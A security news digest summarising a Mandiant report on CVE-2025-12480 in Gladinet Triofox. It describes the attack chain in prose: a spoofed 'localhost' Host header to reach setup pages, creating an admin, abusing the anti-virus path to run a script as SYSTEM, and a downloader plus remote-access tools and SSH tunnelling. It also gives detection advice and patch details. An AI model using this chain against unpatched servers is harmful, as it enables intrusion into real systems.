TL;DR
Mandiant reported exploitation of an unauthenticated access flaw in Gladinet’s Triofox (CVE-2025-12480) that allowed attackers to bypass authentication, create an admin account and run arbitrary code. Attackers chained a host-header based bypass with abuse of Triofox’s anti-virus configuration to execute payloads as SYSTEM and deploy remote-access tools.
What happened
Mandiant Threat Defense investigated activity on a customer Triofox server and traced it to an unauthenticated access control defect in Gladinet’s Triofox file‑sharing platform. The flaw, tracked as CVE-2025-12480, stems from access checks that treat requests whose Host header equals “localhost” as local, permitting an attacker to reach initial setup pages (AdminDatabase.aspx and AdminAccount.aspx) by spoofing that header. Using this bypass the attacker completed the setup workflow to create a new native admin account and then abused the product’s anti-virus configuration to point the scanner path at a malicious batch file. Because the configured scanner runs with the Triofox process privileges (SYSTEM in the observed environment), the script executed and launched a downloader that retrieved a disguised Zoho UEMS installer. The adversary then used that agent to install remote-access utilities and established SSH tunneling (via Plink/PuTTY tools) to forward RDP into the compromised host. Mandiant observed exploitation of Triofox version 16.4.10317.56372; Gladinet issued fixes in release 16.7.10368.56560, and Mandiant validated remediation.
Why it matters
- Unauthenticated bypass: The flaw permits remote actors to reach privileged setup pages without valid credentials by spoofing the HTTP Host header.
- Local-to-remote escalation: The anti‑virus configuration can be pointed to attacker-controlled binaries that execute with the product’s system-level privileges.
- Persistent remote access: Attackers used legitimate management/agent software to deploy remote‑access tools, increasing the difficulty of detection and removal.
- Network pivoting: SSH tunneling and RDP forwarding were used to allow external access into internal systems via the compromised host.
Key facts
- CVE identifier: CVE-2025-12480.
- Affected product: Gladinet Triofox; confirmed exploitation against version 16.4.10317.56372.
- Fixed in Triofox release 16.7.10368.56560 (vendor-engaged with Mandiant and validated).
- Initial public observation: Mandiant noted exploitation by a group tracked as UNC6485 as early as Aug. 24, 2025 (per Google Threat Intelligence Group telemetry).
- Root cause: access control check relied on Request.Url.Host equaling 'localhost', which can be spoofed via the HTTP Host header.
- Attack chain: host‑header bypass → create admin account → set anti‑virus path to malicious script → script executed as SYSTEM → downloader installs Zoho UEMS agent.
- Downloader behavior: PowerShell command fetched a disguised executable from an external IP and saved it to C:Windowsappcompat before execution.
- Post‑compromise tools: Zoho Assist and AnyDesk were deployed; Plink/Putty binaries were used to build an SSH reverse tunnel to forward RDP.
- Detection signals observed: anomalous HTTP GET with Referer containing localhost, file activity in C:WindowsTemp, and specific command‑line executions recorded by SecOps.
What to watch next
- Monitor HTTP logs for requests with Host headers or Referer values referencing 'localhost' originating from external IPs.
- Audit access to AdminDatabase.aspx, AdminAccount.aspx and InitAccount.aspx; unexpected successful accesses to these pages are an indicator of compromise.
- Look for unusual anti‑virus configuration paths or scanner executables located under shared folders, and any execution of scripts from those paths.
- Check for downloader activity matching the observed PowerShell pattern and for unexpected installations of management agents (Zoho UEMS) or presence of Plink/Putty binaries in temp directories.
Quick glossary
- Host header attack: When an attacker alters the HTTP Host header to influence server-side logic that relies on the header value for access control or routing.
- Unauthenticated access vulnerability: A flaw that allows access to privileged functionality or data without providing valid credentials.
- Remote code execution (RCE): The ability for an attacker to run arbitrary code on a target system, potentially at elevated privileges.
- SSH tunneling / Plink: A method of forwarding network traffic over an SSH connection; Plink is a command-line SSH client used to establish such tunnels.
- Endpoint management agent: Software installed on a host to provide centralized device management; attackers may abuse legitimate agents to run additional software remotely.
Reader FAQ
Has Gladinet released a fix for this issue?
Mandiant validated that the vulnerability is resolved in Triofox release 16.7.10368.56560.
Did attackers achieve code execution with system privileges?
Yes. The observed chain abused the anti‑virus configuration to execute a script under the Triofox process account, which ran as SYSTEM in the reported environment.
Was this exploited in the wild?
Yes. Mandiant observed exploitation by an activity cluster tracked as UNC6485, with activity dating to at least Aug. 24, 2025.
Are all Triofox versions affected?
Only version 16.4.10317.56372 was specifically referenced as vulnerable in the report; other versions are not confirmed in the source.
How were remote‑access tools delivered?
The attackers downloaded a disguised installer (reported URL and path) and used the resulting agent to deploy Zoho Assist and AnyDesk, per the investigation.
Written by: Stallone D'Souza, Praveeth DSouza, Bill Glynn, Kevin O'Flynn, Yash Gupta Welcome to the Frontline Bulletin Series Straight from Mandiant Threat Defense, the "Frontline Bulletin" series brings you the…
Sources
- No Place Like Localhost: Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480
- Triofox Unauthenticated Access Control Vulnerability (CVE …
- Tales from the Exploit Mines: Gladinet Triofox CVE-2025- …
- Attackers exploited another Gladinet Triofox vulnerability …
Related posts
- UNC1549 exploits third-party access, VDI breakouts and custom malware
- Beyond the Watering Hole — APT24 Shifts to Multi-Vector Espionage Attacks
- Sanctioned Intellexa Continues to Deploy Multiple Mobile Zero-Day Exploits